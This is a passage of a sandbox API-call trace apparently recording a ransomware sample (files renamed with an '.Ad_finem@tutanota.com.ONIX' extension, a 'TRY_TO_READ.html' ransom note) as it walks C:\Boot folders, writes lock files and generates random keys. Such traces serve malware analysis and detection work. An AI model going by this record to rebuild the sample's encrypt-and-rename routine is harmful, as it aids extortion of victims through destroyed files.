nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.410] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.410] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.410] GetLastError () returned 0x6 [0065.410] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.410] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.410] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.410] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.410] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.410] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.410] FindNextFileW (in: hFindFile=0x447e68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30948810, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.410] CloseHandle (hObject=0x3cc) returned 1 [0065.410] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.410] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x31)) [0065.410] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.411] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.411] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.411] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\es-ES9c354ca09c354b444c.lock") returned 37 [0065.411] CreateFileW (lpFileName="C:\\\\Boot\\es-ES9c354ca09c354b444c.lock" (normalized: "c:\\boot\\es-es9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.411] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.411] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.411] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.411] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cc48 | out: hHeap=0x410000) returned 1 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cc70 | out: hHeap=0x410000) returned 1 [0065.412] FindFirstFileW (in: lpFileName="C:\\\\Boot\\es-ES\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447ea8 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.412] GetLastError () returned 0x0 [0065.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cc48 [0065.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447ee8 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447ee8 | out: hHeap=0x410000) returned 1 [0065.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cc48 | out: hHeap=0x410000) returned 1 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.412] FindNextFileW (in: hFindFile=0x447ea8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.412] GetLastError () returned 0x0 [0065.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cc48 [0065.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447ee8 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447ee8 | out: hHeap=0x410000) returned 1 [0065.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cc48 | out: hHeap=0x410000) returned 1 [0065.412] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.412] FindNextFileW (in: hFindFile=0x447ea8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.413] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.413] GetLastError () returned 0x0 [0065.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cc48 [0065.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.413] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.413] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.413] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cc48 | out: hHeap=0x410000) returned 1 [0065.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48c330 [0065.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466618 [0065.413] CreateFileW (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.413] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.413] CreateFileW (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.413] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.414] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48c330 | out: pbBuffer=0x48c330) returned 1 [0065.414] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466618 | out: pbBuffer=0x466618) returned 1 [0065.414] SetFileAttributesW (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.414] lstrlenW (lpString="C:\\\\Boot\\es-ES\\bootmgr.exe.mui") returned 30 [0065.414] GetProcessHeap () returned 0x410000 [0065.414] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.414] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\es-ES\\bootmgr.exe.mui") returned="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" [0065.414] lstrcatW (in: lpString1="C:\\\\Boot\\es-ES\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.414] GetProcessHeap () returned 0x410000 [0065.414] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.414] CloseHandle (hObject=0xffffffff) returned 0 [0065.414] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.414] FindNextFileW (in: hFindFile=0x447ea8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30948810, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.414] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.414] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.414] GetLastError () returned 0x6 [0065.414] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.414] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.414] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.414] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.414] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.414] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.414] FindNextFileW (in: hFindFile=0x447ea8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30948810, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.414] CloseHandle (hObject=0x3cc) returned 1 [0065.414] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.414] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x31)) [0065.415] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.415] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.415] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.415] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\fi-FI9c354ca09c354b444c.lock") returned 37 [0065.415] CreateFileW (lpFileName="C:\\\\Boot\\fi-FI9c354ca09c354b444c.lock" (normalized: "c:\\boot\\fi-fi9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.415] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.415] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.416] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.416] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cc98 | out: hHeap=0x410000) returned 1 [0065.416] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ccc0 | out: hHeap=0x410000) returned 1 [0065.416] FindFirstFileW (in: lpFileName="C:\\\\Boot\\fi-FI\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447ee8 [0065.416] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.416] GetLastError () returned 0x0 [0065.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.416] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cc98 [0065.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e330 [0065.416] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e330 | out: hHeap=0x410000) returned 1 [0065.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.416] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.416] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cc98 | out: hHeap=0x410000) returned 1 [0065.416] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.416] FindNextFileW (in: hFindFile=0x447ee8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.416] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.416] GetLastError () returned 0x0 [0065.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.416] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.417] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cc98 [0065.417] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e330 [0065.417] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e330 | out: hHeap=0x410000) returned 1 [0065.417] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.417] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.417] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cc98 | out: hHeap=0x410000) returned 1 [0065.417] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.417] FindNextFileW (in: hFindFile=0x447ee8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.417] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.417] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.417] GetLastError () returned 0x0 [0065.417] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cc98 [0065.417] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.417] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.417] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.417] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.417] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cc98 | out: hHeap=0x410000) returned 1 [0065.417] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.417] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48c438 [0065.417] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466628 [0065.417] CreateFileW (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.417] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.417] CreateFileW (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.417] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.418] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48c438 | out: pbBuffer=0x48c438) returned 1 [0065.418] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466628 | out: pbBuffer=0x466628) returned 1 [0065.418] SetFileAttributesW (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.418] lstrlenW (lpString="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui") returned 30 [0065.418] GetProcessHeap () returned 0x410000 [0065.418] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.418] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui") returned="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" [0065.418] lstrcatW (in: lpString1="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.418] GetProcessHeap () returned 0x410000 [0065.418] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.418] CloseHandle (hObject=0xffffffff) returned 0 [0065.418] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.418] FindNextFileW (in: hFindFile=0x447ee8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30948810, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.418] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.418] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.418] GetLastError () returned 0x6 [0065.418] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.418] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.418] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.418] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.418] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.418] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.418] FindNextFileW (in: hFindFile=0x447ee8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30948810, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.418] CloseHandle (hObject=0x3cc) returned 1 [0065.418] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.419] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x41)) [0065.419] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.419] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.419] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.419] wsprintfW 